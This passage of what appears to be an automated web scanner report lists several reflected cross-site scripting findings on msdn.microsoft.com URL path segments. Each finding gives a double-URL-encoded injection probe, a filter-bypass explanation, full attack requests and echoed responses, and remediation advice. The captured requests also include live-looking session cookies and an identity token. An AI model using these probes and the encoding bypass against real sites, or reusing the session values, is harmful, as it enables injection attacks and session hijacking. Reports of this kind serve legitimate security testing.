Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:58:26 GMT
Content-Length: 9192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library4104c"><a>afd812d233f/ms689718(v=vs.85)" />
...[SNIP]...

2.122. http://msdn.microsoft.com/en-us/library/ms689718(v=vs.85).aspx [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms689718(v=vs.85).aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4022c%2522%253e%253ca%253e3828408d185 was submitted in the REST URL parameter 3. This input was echoed as 4022c"><a>3828408d185 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/ms689718(v4022c%2522%253e%253ca%253e3828408d185=vs.85).aspx HTTP/1.1
Host: msdn.microsoft.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; mcI=Sat, 06 Nov 2010 18:51:25 GMT; ixpLightBrowser=1; viewkey=loband; __qca=P0-1185849018-1290642834531; __unam=289c965-12c804ebf38-f510776-6; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; MS0=e6b8850fc3b54b87b9cd070b16412ced; 
A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:58:57 GMT
Content-Length: 9193

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ms689718(v4022c"><a>3828408d185=vs.85)" />
...[SNIP]...

2.123. http://msdn.microsoft.com/en-us/library/ms690384(VS.85).aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms690384(VS.85).aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e8ab%2522%253e%253ca%253ef7a12be2b11 was submitted in the REST URL parameter 1. This input was echoed as 8e8ab"><a>f7a12be2b11 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us8e8ab%2522%253e%253ca%253ef7a12be2b11/library/ms690384(VS.85).aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9213
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us8e8ab"><a>f7a12be2b11/library/ms690384(VS.85)" />
...[SNIP]...

2.124. http://msdn.microsoft.com/en-us/library/ms690384(VS.85).aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms690384(VS.85).aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65890%2522%253e%253ca%253ec471cad6006 was submitted in the REST URL parameter 2. This input was echoed as 65890"><a>c471cad6006 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library65890%2522%253e%253ca%253ec471cad6006/ms690384(VS.85).aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9213
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:15:12 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library65890"><a>c471cad6006/ms690384(VS.85)" />
...[SNIP]...

2.125. http://msdn.microsoft.com/en-us/library/ms690384(VS.85).aspx [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms690384(VS.85).aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e453%2522%253e%253ca%253e10d89de2b26 was submitted in the REST URL parameter 3. This input was echoed as 7e453"><a>10d89de2b26 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/ms690384(VS.85).aspx7e453%2522%253e%253ca%253e10d89de2b26 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9223
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:15:24 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ms690384(VS.85).aspx7e453"><a>10d89de2b26" />
...[SNIP]...

2.126. http://msdn.microsoft.com/en-us/library/ms691105(VS.85).aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms691105(VS.85).aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34672%2522%253e%253ca%253e13af3ebde69 was submitted in the REST URL parameter 1. This input was echoed as 34672"><a>13af3ebde69 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us34672%2522%253e%253ca%253e13af3ebde69/library/ms691105(VS.85).aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9213
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:46 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us34672"><a>13af3ebde69/library/ms691105(VS.85)" />
...[SNIP]...

2.127. http://msdn.microsoft.com/en-us/library/ms691105(VS.85).aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms691105(VS.85).aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcffb%2522%253e%253ca%253e734127f3eb7 was submitted in the REST URL parameter 2. This input was echoed as fcffb"><a>734127f3eb7 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/libraryfcffb%2522%253e%253ca%253e734127f3eb7/ms691105(VS.85).aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9213
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:15:00 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/libraryfcffb"><a>734127f3eb7/ms691105(VS.85)" />
...[SNIP]...

